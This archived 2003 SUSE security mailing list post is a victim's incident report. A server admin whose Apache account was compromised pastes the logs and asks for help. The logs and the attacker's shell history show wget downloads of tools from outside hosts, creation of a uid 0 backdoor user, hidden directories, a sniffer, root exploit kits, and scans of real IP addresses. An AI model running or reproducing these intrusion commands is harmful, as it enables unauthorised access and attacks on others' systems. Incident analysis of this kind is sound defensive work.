[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[suse-security] Apache Gain Remote Shell Access

To: suse-security <suse-security@xxxxxxxx>
Subject: [suse-security] Apache Gain Remote Shell Access
From: Marco Lum <marco@xxxxxxxxxxxxx>
Date: Thu, 04 Sep 2003 00:43:07 +0800
Delivered-to: mailing list suse-security@xxxxxxxx
Delivery-date: Wed, 03 Sep 2003 18:43:56 +0200
Envelope-to: suse@xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
List-help: <mailto:suse-security-help@suse.com>
List-post: <mailto:suse-security@suse.com>
List-subscribe: <mailto:suse-security-subscribe@suse.com>
List-unsubscribe: <mailto:suse-security-unsubscribe-suse=archive.cert.uni-stuttgart.de@suse.com>
Mailing-list: contact suse-security-help@xxxxxxxx; run by ezmlm
Organization: HK Service
User-agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)

Help, Help, Somebody help!!!

I Found somebody gain access using wwwrun, Download programs and try to
hack into other server.

Follows found in error_log of apache

--09:41:10--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]

    0K .........                                             100%
13.69 KB/s

09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]


bind: Address already in use
bind: Address already in use
--09:33:57--  http://geocities.com/supers7ar/bin.tar.gz
           => `bin.tar.gz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,748 [application/x-gzip]

    0K .......... .........                                  100%
65.37 KB/s

09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]

sh: line 1: ./bin.tar.gz: Permission denied

gzip: stdin: not in gzip format
tar: Child returned status 1--15:50:22--  http://195.174.78.202/a.out
           => `a.out'
Resolving 195.174.78.202... done.
Connecting to 195.174.78.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,444 [text/plain]

    0K .......... ...                                        100%
3.37 KB/s

15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]

sh: line 1: ./a.out: Permission denied
chmod: invalid mode string: `x'
sh: line 1: ./a.out: Permission denied
Bad syntax, perhaps a bogus '-'?

sh: line 1: cd: /tmp/vulturu: No such file or directory
--20:25:35--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]

    0K .........                                             100%
13.67 KB/s

20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]


tar: Error exit delayed from previous errors

sh: line 1: cd: /tmp/": No such file or directory


Also Found his command history:


	id
/usr/sbin/adduser vulturul -u0 -g0 -M;
cd /usr/local/games/
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
cd /tmp/"   "
socklist
killall -9 nsl
ls -ax
rm -rf epcs2
rm -rf ns
rm -rf nsl
rm -rf p
rm -rf pk
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
tar xvfz bnc.tgz
mv psybnc "~.          "
cd "~.          "
mv psybnc "          "
export PATH=:PATH
./"          "
id
ls --color
./li
ls --color
./p
exec ./p 8003
id
pwd
cd ..
cd ..
ls -ax
ls -ax --color
rm -rf edu.gz
rm -rf local.tar.gz
rm -rf local
cd 3du
ls --colorls --color
./scan 200.13.230.37
./scan 200.13.230.37 -d 6
./scan 202.30.198.226 -d 6
/scan 202.186.250.157
./scan
./scan 202.186.250.157
./scan 202.186.250.157 -d 6
./scan 64.106.104.84 -d 6
./scan 64.106.104.84 -d 6
./scan 128.119.213.136 -d 2
d ..
cd ..
ls -ax
cd atd
ls -ax
./osslmass2 mass.log
./osslmass2 mass.log
cd ../atd
ls -ax
cd ..
ls -ax --color
pico
./pico
mv pico /usr/bin
pico
ls -ax
mv pico /usr/bin
cp pico /usr/bin/pico
cd 3du
ls -ax --color
cd ..
wget http://geocities.com/supers7ar/boom.tar.gz
tar xvfz boom.tar.gz
cd boom
ls -ax
./r00t./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2
./r00t -t 193.231.142 -d 4
./r00t -t 193.231.142 -d 7
./r00t -t 193.231.142 -d 8
cd ..
pwd
wget http://geocities.com/supers7ar/sshup.tar.gz
tar xvfz sshup.tar.gz
cd ssh-3.0.1/
ls -ax
cd ..
rm -rf ssh-3.0.1/
rm -rf sshup.tar.gz
ls -ax --color
rm -rf boom.tar.gz
cd  ~.
cd " ~.

q

q

}

q

exit

ls -ax
wget www.vulturul.org/vulturul/linsniffer
chmod +x linsniffer
./linsniffer
ls -ax
rm -rf linsniffer
ls -ax --color
id
./heh

./r00t -t 128.100.20 -d 8
./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2

./scan 200.13.230.37

Please help, I Can't found where he can get in~~!

-- 
Marco Lum
Net Service Manager

___________________________________________________________________________________________
System Development Service
Inter/Intra/Local-Area Networking Service

VOICE: +852 2851 1190
FAX  : +852 2851 1109
Email: enquiry@xxxxxxxxxxxxx
WWWeb: http://www.hkservice.com

HK Service Company
HK Service Consultants Limited




-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here

Follow-Ups:
- Re: [suse-security] Apache Gain Remote Shell Access
  - From: Radu Voicu
- Re: [suse-security] Apache Gain Remote Shell Access
  - From: Radu Voicu
- [suse-security] Re: Apache Gain Remote Shell Access
  - From: Stefan Andreas Tichy
- Re: [suse-security] Apache Gain Remote Shell Access
  - From: Sven 'Darkman' Michels

Prev by Date: [suse-security] SSH, SCP, JAIL and "You don't exist, go away!"
Next by Date: Re: [suse-security] Apache Gain Remote Shell Access
Previous by thread: Re: [suse-security] SSH, SCP, JAIL and "You don't exist, go away!"
Next by thread: Re: [suse-security] Apache Gain Remote Shell Access
Index(es):
- Date
- Thread